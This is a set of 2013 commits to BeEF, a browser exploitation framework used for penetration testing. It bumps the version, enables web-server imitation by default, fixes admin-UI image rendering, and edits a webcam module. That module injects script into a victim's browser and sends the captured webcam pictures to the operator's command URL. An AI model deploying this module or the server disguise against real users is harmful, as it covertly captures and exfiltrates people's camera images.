Update version to '0.4.4.4.1-alpha' bug fix edition

Fix bug with module image result rendering in admin UI
Update webcam module so the picture returned as a base64 encoded string
2013-05-01 17:49:21 +09:30 · 2013-05-01 17:47:00 +09:30 · 2013-05-01 16:44:28 +09:30 · 2013-05-01 16:43:26 +09:30 · 2013-04-30 18:56:37 +09:30
4 changed files with 19 additions and 13 deletions
--- a/2
+++ b/2
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #

-0.4.4.4-alpha
+0.4.4.4.1-alpha
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file

 beef:
-    version: '0.4.4.4-alpha'
+    version: '0.4.4.4.1-alpha'
    debug: false

    restrictions:
@@ -43,7 +43,7 @@ beef:

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
-            enable: false
+            enable: true
            type: "apache" #supported: apache, iis

        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -249,18 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-								//Check if the data is the image parameter and that it's a base64 encoded png.
-                                if ($jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(0,28) == "image=data:image/png;base64,") {
-                                	//Lets display the image. // Does this introduce issues? Or, does the encoding keep this sound?
-                                	html += String.format('<img src="{0}" /><br>', $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(6));
-                                } else {
-	                                //output escape everything, but allow the <br> tag for better rendering.
-									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
 								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}
--- a/modules/browser/webcam/command.js
+++ b/modules/browser/webcam/command.js
@@ -22,7 +22,7 @@ beef.execute(function() {
    
    
    //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
-    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){  }';
    
    //This function is called by swfobject, if if fails to add the flash file to the page
Author	SHA1	Message	Date
bcoles	6da4e2c39c	Update version to '0.4.4.4.1-alpha' bug fix edition	2013-05-01 17:49:21 +09:30
bcoles	15c7e64e93	Fix bug with module image result rendering in admin UI	2013-05-01 17:47:00 +09:30
bcoles	91e2b36ce4	Update webcam module so the picture returned as a base64 encoded string will be rendered in the admin UI	2013-05-01 16:44:28 +09:30
bcoles	b82696ead2	Enabled web server imitation by default The time has come. This feature has been stable for a while.	2013-05-01 16:43:26 +09:30
bcoles	7233957664	Update version	2013-04-30 18:56:37 +09:30